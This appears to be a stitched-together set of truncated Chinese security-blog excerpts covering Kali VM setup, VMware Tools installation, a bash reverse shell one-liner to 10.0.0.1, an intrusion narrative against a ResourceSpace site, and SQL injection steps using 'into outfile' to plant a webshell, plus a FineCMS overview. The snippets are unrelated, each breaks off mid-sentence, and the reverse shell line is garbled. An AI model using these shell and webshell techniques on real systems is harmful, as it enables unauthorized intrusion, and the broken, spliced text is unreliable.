安装虚拟机打开 VMware Workstation ，选择“创建新的虚拟机” 选择“自定义”安装模式 选择“linux”和“Bebian 8.x 64位” 填写虚拟机名称，可以根据自己情况填写，位置选择一个容量大速度快的盘符和位置，并且为 Kali 虚拟机单独建个文件夹，之后好管理。 根据自己电脑情况分配 CPU 数量，我的

依次选择“虚拟机（M）—— 安装 VMware Tools”， 加载完成后，复制 VMware Tools-10.0.10***.tar.gz （不同版本具体名字不同）到 home 目录 tools 文件夹（tools文件夹需要手动创建）， 解压：tar -xzvf VMware Tools ***.tar.gz，VMwareTools ***.tar.gz 根据自己文件内容要换成具

1.Bash:•bash–i >&/dev/tcp/10.0.0.1/80800>&1 //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中，0>&1将标准输入重定向到标准输出中。•Linuxshell文件描述符：•1.标准输入：代码为0，使用•2.标准输出：代码为1，使用>或>>;•3.标准错误输出：

寻找突破口对方主站是一个定制开发的CMS，在进行一系列扫描和分析之后，未发现可利用的地方，于是开始分析其二级域名，发现其中某资源管理分站，目标操作系统linux，仅开放HTTP（80端口），整站程序为ResourceSpace，一个开源php建站程序。漏洞挖掘因为是开源程序，考虑其漏洞挖掘相对容易一些，于是决定把这个网站作为突破口。于是到resourcespace的官方网站

原理：利用MySQL中的写命令into outfile(固定式：select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件 工具：中国菜刀1.首先查找SQL注入点使用单引号'报错，使用and 1=1页面正常和and 1=2页面不正常，来判断存在SQL注入2.使用order by猜测字段数量?id=1+order+by+2--+

FineCMS（简称FC）是一款基于PHP+MySql开发的中小型内容管理系统，采用MVC设计模式实现业务逻辑与表现层的适当分离，使网页设计师能够轻松设计出理想的模板， 插件化方式开发功能易用便于扩展，支持自定义内容模型和会员模型，并且可以自定义字段，可面向中小型站点提供重量级网站建设解决方案。目前有三个分支:1.x，2.x，5.x。FineCMS基本目录结构 ..../cache